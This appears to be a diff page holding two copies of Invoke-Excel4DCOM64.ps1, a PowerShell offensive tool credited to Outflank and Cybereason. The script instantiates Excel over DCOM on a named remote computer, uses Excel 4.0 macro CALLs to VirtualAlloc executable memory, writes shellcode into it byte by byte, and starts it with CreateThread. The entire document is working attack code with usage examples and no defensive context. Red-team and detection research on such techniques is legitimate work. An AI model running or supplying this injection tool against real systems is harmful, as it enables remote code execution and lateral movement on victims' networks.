Philts · May 13, 2023 23:08
diff --git a/Invoke-Excel4DCOM64.ps1 b/Invoke-Excel4DCOM64.ps1
 #********************************************************************** 
 # Invoke-Excel4DCOM64.ps1 
 # Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
 # Author: Stan Hegt (@StanHacked) / Outflank, x64 support by  Philip Tsukerman (@PhilipTsukerman) / Cybereason
 # Date: 2019/04/21
 # Version: 1.1
 #********************************************************************** 
 
 function Invoke-Excel4DCOM
 {
 <#
 .SYNOPSIS
 Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM.
 .DESCRIPTION
 Use Excel 4.0 / XLM macros on a DCOM instance of excel.exe to do shellcode injection. Take care to run with the x64 switch for x64 Office,
 and to use a Powershell version with the same bitness as the Office version when running locally.
 .PARAMETER Computername
 Specify a remote host to inject into.
 .PARAMETER UserList
 Specify a file containing the x86 shellcode.
 .EXAMPLE
 PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin
 Inject x86 payload from payload.bin into excel.exe on server01.

 PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\x64payload.bin -x64
 Inject x64 64payload from payload.bin into excel.exe on server01.

 .LINK
 http://www.outflank.nl
 .NOTES
 Outflank - [email protected]
 #> 
 	[CmdletBinding()] Param(
 		[Parameter(Mandatory = $true, Position = 0, ValueFromPipeline=$true)]
 		[Alias("PSComputerName","MachineName","IP","IPAddress","Host")]
 		[String]
 		$ComputerName,
 		
 		[Parameter(Position = 1, Mandatory = $true)]
 		[Alias("Shellcode")]
 		[String]
 		$Payload,

 		[switch]$x64
 	)
 	
 	# Create an instance of the Excel.Application COM object
 	$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
 	if ($x64) {
 	    # If we are using 64bit Excel, try to allocate a low address
 	    $lpAddress = 1342177280
 	}
 	else {
 	    $lpAddress = 0
 	}
 	$sc = get-content -Encoding Byte $Payload
 	
 	# Address allocation
 	$memaddr = $excel.ExecuteExcel4Macro('CALL("Kernel32","VirtualAlloc","JJJJJ",'+$lpAddress+',' + $sc.length + ',12288,64)')

 	$count = 0
 	# Write the payload byte by byte to oure allocated buffer
 	foreach ($byte in $sc) {
 		$ret = $excel.ExecuteExcel4Macro('CALL("ntdll","memset","JJJJ", ' + ($memaddr + $count) + ',' + $byte + ', 1)')
 		$count = $count + 1
 		
 		Write-Progress -Id 1 -Activity "Invoke-Excel4DCOM64" -CurrentOperation "Injecting shellcode" -PercentComplete ($count / $sc.length * 100)
 	}
 	
 	# Shellcode Time!
 	$excel.ExecuteExcel4Macro('CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, ' + $memaddr + ', 0, 0, 0)')
 }
	#**********************************************************************
	# Invoke-Excel4DCOM64.ps1
	# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
	# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason
	# Date: 2019/04/21
	# Version: 1.1
	#**********************************************************************

	function Invoke-Excel4DCOM
	{
	<#
	.SYNOPSIS
	Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM.
	.DESCRIPTION
	Use Excel 4.0 / XLM macros on a DCOM instance of excel.exe to do shellcode injection. Take care to run with the x64 switch for x64 Office,
	and to use a Powershell version with the same bitness as the Office version when running locally.
	.PARAMETER Computername
	Specify a remote host to inject into.
	.PARAMETER UserList
	Specify a file containing the x86 shellcode.
	.EXAMPLE
	PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin
	Inject x86 payload from payload.bin into excel.exe on server01.

	PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\x64payload.bin -x64
	Inject x64 64payload from payload.bin into excel.exe on server01.

	.LINK
	http://www.outflank.nl
	.NOTES
	Outflank - [email protected]
	#>
	[CmdletBinding()] Param(
	[Parameter(Mandatory = $true, Position = 0, ValueFromPipeline=$true)]
	[Alias("PSComputerName","MachineName","IP","IPAddress","Host")]
	[String]
	$ComputerName,

	[Parameter(Position = 1, Mandatory = $true)]
	[Alias("Shellcode")]
	[String]
	$Payload,

	[switch]$x64
	)

	# Create an instance of the Excel.Application COM object
	$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
	if ($x64) {
	# If we are using 64bit Excel, try to allocate a low address
	$lpAddress = 1342177280
	}
	else {
	$lpAddress = 0
	}
	$sc = get-content -Encoding Byte $Payload

	# Address allocation
	$memaddr = $excel.ExecuteExcel4Macro('CALL("Kernel32","VirtualAlloc","JJJJJ",'+$lpAddress+',' + $sc.length + ',12288,64)')

	$count = 0
	# Write the payload byte by byte to oure allocated buffer
	foreach ($byte in $sc) {
	$ret = $excel.ExecuteExcel4Macro('CALL("ntdll","memset","JJJJ", ' + ($memaddr + $count) + ',' + $byte + ', 1)')
	$count = $count + 1

	Write-Progress -Id 1 -Activity "Invoke-Excel4DCOM64" -CurrentOperation "Injecting shellcode" -PercentComplete ($count / $sc.length * 100)
	}

	# Shellcode Time!
	$excel.ExecuteExcel4Macro('CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, ' + $memaddr + ', 0, 0, 0)')
	}